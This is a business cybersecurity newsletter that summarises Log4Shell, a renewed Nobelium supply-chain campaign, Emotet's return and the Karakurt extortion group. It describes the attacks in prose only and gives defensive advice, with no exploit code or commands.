Welcome to the latest edition of the Neu Cyber Threats, a weekly series in which we bring attention to the latest cybersecurity and phishing threats in order to ensure you stay safe online.

Here are the most prominent threats which you should be aware of:


“Log4Shell” flaw causing problems around the world

An easy to exploit flaw in the Java logging library Apache Log4j could allow unauthenticated remote code execution (RCE), which could lead to complete server takeover. 

The flaw first appeared last week on, of all things, websites related to the one of the most popular games in the world, Minecraft. The sites warned that attackers could unleash malicious code on either servers or clients running the Java version of Minecraft by manipulating log messages, including from text typed into chat messages. 

Before long, the as-yet-unpatched flaw was dubbed “Log4Shell” by researchers, before being tracked as CVE-2021-44228. Then, another group of researchers added that it was seeing attacks on its honeypots coming from the Tor criminal network as threat actors tried to exploit the new bug, 

Researchers added that this problem could cause an internet meltdown, given that Log4j is incorporated into lots of popular frameworks, including Apache Struts2, Apache Solr, Apache Druid and Apache Flink. This exposes a number of third-party apps that may also be vulnerable to the same type of high-severity exploits as those spotted in Minecraft, as well as cloud services such as Apple iCloud. 

Even though an initial fix was rushed out at the end of last week, this will take time to trickle down to all of the various projects, given how extensively the logging library is incorporated with them downstream. 

An example of the bug’s massive reach is the National Security Agency (NSA), who commented that even the NSA’s GHIDRA – a suite of reverse engineering tools – includes the buggy Log4j library. 

“The Log4j vulnerability is a significant threat for exploitation due to the widespread inclusion in software frameworks. 

The bug has been assigned the maximum CVSS score of 10, given how easy it is to exploit, the attackers’ ability to seize control of targeted servers and how common Log4j is. According to researchers, the hole in security can be exploited by simply logging a special string. 

Security experts added: “This Log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string.” 

Some are already comparing this scenario to that of Shellshock, with regards to its huge potential severity. Also known as Bashdoor, Shellshock was a family of security bugs in the Unix Bash shell, present in almost all Linux, UNIX and Mac OS X deployments. Within hours of its disclosure in 2014, Shellshock was being exploited by botnets of compromised computers to perform distributed denial-of-service (DDoS) attacks and vulnerability scanning. 

Security researchers have predicted that threat actors will likely include payloads in simple HTTP connections, either in a User-Agent header or trivial POST form data. “Organisations are already seeing signs of exploitation in the wild, which means adversaries will just spray-and-pray across the internet – hoping for some luck.” 

It is recommended that organisations that are actively using Apache log4j upgrade to log4j-2.1.50-rc2 as soon as possible. Vulnerability also depends on specific configurations. But there are “other attack vectors targeting this vulnerability which can result in Remote Control Execution. Depending on what code is present on the server, an attacker could leverage this existing code to execute a payload.” 

Businesses can tell if they’re affected by examining log files for services using affected Log4j versions. If they contain user-controlled strings they could be affected. By adopting an assumed breach mentality and reviewing logs for impacted applications for unusual activity, organisations can keep on top of this evolving situation. 

Neuways advises businesses who are concerned by the flaw to contact their software providers to ensure that patches have been applied and all software their business is using is secure, as well as contacting their MSP. Some businesses may have CRM or accounting software that isn’t managed by their MSP, so it is important that all bases are covered to ensure complete safety.

SolarWinds supply chain attackers strike again

Neu Cyber Threats

One year after the notorious SolarWinds supply-chain attacks, the criminals behind it are striking again. Researchers said that they’ve seen the threat group – which Microsoft refers to as “Nobelium” – compromising global business and government targets with novel tactics and custom malware, allowing them to steal data and move laterally across networks.

Two distinct clusters of activity can be plausibly attributed to the threat group. Indeed, resellers were the target of a Nobelium campaign that Microsoft revealed in October, in which the group was seen using credential-stuffing and phishing, as well as API abuse and token theft, to gather legitimate account credentials and privileged access to reseller networks. The ultimate goal of this campaign seemed to be to reach downstream customer networks.

Additionally, Nobelium also engaged in credential theft earlier in 2021, using a backdoor called FoggyWeb to attack ActiveDirectory servers.

In these latest clusters, stolen credentials facilitated initial access to the targeted organisations. Researchers also believe that threat actors acquired the credentials from an info-stealer malware campaign of a third party rather than one of their own.

Attackers have added a number of novel tactics, techniques and procedures to bypass security restrictions within environments, including the extraction of virtual machines to determine internal routing configurations.

There is also new malware in their arsenal: a new, bespoke downloader that researchers have called Ceeloader. The malware, which is heavily obfuscated, is written in C and can execute shellcode payloads directly in memory, according to researchers.

A Cobalt Strike beacon installs and executes Ceeloader, which does not have persistence, so cannot run automatically when Windows is started. The malware can evade security protections by mixing calls to the Windows API with large blocks of useless code.

Other activity observed in the attacks includes using accounts with application impersonation privileges to harvest sensitive mail data, using residential IP proxy services and newly provisioned geo-located infrastructure to communicate with compromised victims. This is in addition to the abuse of multi-factor authentication (MFA) to leverage “push” notifications on smartphones.

The so-called SolarWinds attack that was discovered last December is now the stuff of legend. It became a cautionary tale for how quickly and how far a cyber attack can spread through a global supply chain. Those attacks affected numerous organisations and Nobelium used a malicious binary called “Sunburst” as a backdoor into SolarWinds.Orion.Core.BusinessLayer.dll, a SolarWinds digitally signed component of the Orion software framework. The component is a plug-in that communicates via HTTP to third-party servers, allowing the attack to proliferate quickly.

There is similar potential for widespread attack in the new clusters observed by researchers. They observed “multiple instances where the threat actor compromised service providers and used the privileged access and credentials belonging to these providers to compromise downstream customers.”

Attackers also used credentials they appear to have obtained from the third-party info-stealer campaign to gain access to an organisation’s Microsoft 365 environment via a stolen session token. Researchers identified the info-stealer on some of the affected systems shortly before the token was generated.

One creative technique researchers observed Nobelium using in the attacks is the abuse of repeated MFA push notifications to gain access to corporate accounts. As many MFA providers allow users to accept a phone app push notification or to receive a phone call and press a key as a second factor to authenticate access to an account, attackers are taking advantage.

By using a valid username and password combination, attackers issued multiple MFA requests to an end user’s legitimate device until the target accepted the authentication. This ultimately granted the threat actor access to the account.

All in all, the new cluster of activity is not good news for businesses. It shows that Nobelium’s potential for dangerous threat activity seems to be rising in both sophistication and intensity, signalling the potential for another SolarWinds style attack on the horizon.

Neuways advises businesses to take note of these types of attacks – especially the abuse of the MFA system. Always question any prompts that are asked of you, as these could lead to a handover of your credentials to cyber criminals.

Emotet attacks could cause spate of ransomware attacks

Emotet malware is spreading, after a period of very little activity. The rapid spread of Emotet via TrickBot and its behaviour since it resurfaced last month could signal a spate of ransomware attacks.

In mid-November, a team of researchers observed the TrickBot trojan launching what appears to be a new loader for the notorious Emotet, which has been called “the world’s most dangerous malware.”

Now Emotet has been observed directly installing Cobalt Strike beacons on infected devices, which can give cyber criminals direct access to install ransomware on target systems.

Researchers also revealed that TrickBot has amassed 140,000 victims across 149 countries in only 10 months. There have also been 223 different TrickBot campaigns spotted across the last six months, with targets including finance and manufacturing.

The campaigns have become larger and more widely targeted, with the number of victims growing, despite the drop in the number of campaigns.

Emotet began life as a banking trojan in 2014 and has continually evolved to become a full-service threat-delivery mechanism. The botnet was “once an overbearing threat that held more than 1.5 million machines under its control that are capable of infecting those machines with additional bankers, trojans and ransomware,” according to researchers.

Neuways advises businesses to take extra caution when dealing with unexpected emails that require the user to open a document or click a hyperlink. The return of this malware means that there are extra threats out there, with an increase in expected targeted campaigns to follow. Targeted campaigns are even more dangerous, as typically more specific to an individual or to a business.

Brand new cyber crime group on the rise

There is a new financially motivated cyber crime group on the rise, although, strangely enough, they don’t seem to be interested in deploying ransomware or taking out high-profile targets.

Researchers have been tracking a group that calls itself, “Karakurt,” which focuses on data exfiltration and subsequent extortion, allowing it to move quickly. Since September, it has hit more than 40 victims.

“The group are financially motivated, opportunistic in nature, and appear to be targeting smaller companies or corporate subsidiaries versus the alternative big-game hunting approach,” researchers wrote.

Researchers said they expect that Karakurt will be a bit of a trendsetter and that in the future, other groups will move away from targeting massive corporations or critical-infrastructure providers with ransomware to adopt a similar exfiltration approach. This is because it “enables faster attack execution and steers clear of intentionally disrupting business operations, yet still yields leverage in terms of data extortion,” researchers said.

Karakurt’s tactics for infiltrating victim networks, moving laterally and stealing data are similar to many threat actors. The group often takes a “living off the land” approach depending on the attack surface. This means that they use tools or features that already exist in the target environment.

The group establishes initial access using legitimate VPN credentials, though researchers said it’s unclear how they obtain those credentials. To maintain persistence once accessing a network, Karakurt predominantly uses service creation, remote-management software and distribution of command-and-control (C2) beacons across victim environments using Cobalt Strike.

Recently, the group seems to have switched tactics in its deployment of backup persistence. Instead of deploying Cobalt Strike, Karakurt “persisted within the victim’s network via the VPN IP pool or installed AnyDesk to allow external remote access to compromised devices,” researchers wrote. This allows the group to leverage previously obtained user, service and administrator credentials to move laterally.

The group also use other remote-management tools, remote desktop protocol (RDP), Cobalt Strike and PowerShell commands to move laterally and discover pertinent data to steal and use for extortion purposes as needed, researchers said.

Overall, the group’s attack method shows it is nimble enough to modify its tactics depending on the victim’s environment. Due to Karakurt using valid credentials to access networks, it can manage to evade detection in many cases. Additionally, Karakurt will contact companies multiple times to put pressure on them to pay once their data has been taken.

As a result, businesses should maintain their best cyber security practices, such as patching across all systems, updating anti-virus software and implementing strict network safety policies where feasible to protect themselves. Given the group’s tendency to use valid credentials, organisations should make passwords as complex as they can, as well as using multi-factor authentication (MFA) wherever possible.

Companies should only use admin accounts for valid administrative purposes, and never to connect to the network or browse the internet, as well as reinforcing them with cross-platform MFA procedures.

If you are concerned about any cyber security issues within your business, contact us today on 01283 753 333 or email hello@neuways.com.